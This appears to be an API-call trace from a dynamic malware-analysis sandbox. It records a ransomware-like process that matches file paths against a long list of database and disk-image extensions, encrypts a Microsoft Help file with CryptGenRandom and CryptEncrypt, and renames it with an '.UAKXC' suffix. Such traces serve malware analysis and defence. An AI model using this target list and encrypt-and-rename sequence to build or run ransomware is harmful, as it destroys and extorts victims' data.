StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".nv") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".odb") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".orx") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".owc") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".p96") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".p97") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".pan") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".qry") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".rod") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".scx") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0140.772] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".sis") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".spq") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".sql") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".te") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".temx") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".tps") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".trc") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".trm") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".udb") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".udl") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".usr") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".v12") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".vis") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0140.773] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".xld") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".abs") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".abx") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".adn") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".db2") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".icg") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".icr") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".lut") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".maw") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0140.774] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".raw") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".bin") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0140.775] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".iso") returned 0x0 [0140.775] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.776] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.777] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.777] SetEndOfFile (hFile=0x6c8) returned 1 [0140.777] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.777] ReadFile (in: hFile=0x6c8, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x146, lpOverlapped=0x0) returned 1 [0140.777] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.778] WriteFile (in: hFile=0x6c8, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x146, lpOverlapped=0x0) returned 1 [0140.778] CloseHandle (hObject=0x6c8) returned 1 [0140.779] GetProcessHeap () returned 0xea0000 [0140.779] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0140.779] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" [0140.779] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.UAKXC" [0140.779] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn.uakxc")) returned 1 [0140.780] GetProcessHeap () returned 0xea0000 [0140.780] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0140.780] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee6f8 | out: hHeap=0xea0000) returned 1 [0140.780] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6df8 | out: hHeap=0xea0000) returned 1 [0140.780] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0140.780] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0140.780] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0140.781] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn")) returned 0x2022 [0140.783] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0140.783] GetLastError () returned 0x0 [0140.783] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=332) returned 1 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".accde") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".accft") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".adb") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".ade") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".adf") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".adp") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".arc") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".ora") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".alf") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".ask") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".btr") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".cat") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0140.784] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".cma") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dad") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".db") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".db3") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dct") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0140.785] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".eco") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".edb") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".epim") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".exb") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".fic") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".fol") returned 0x0 [0140.786] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".frm") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".his") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".ib") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".idb") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0140.787] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpSrch=".itdb") returned 0x0 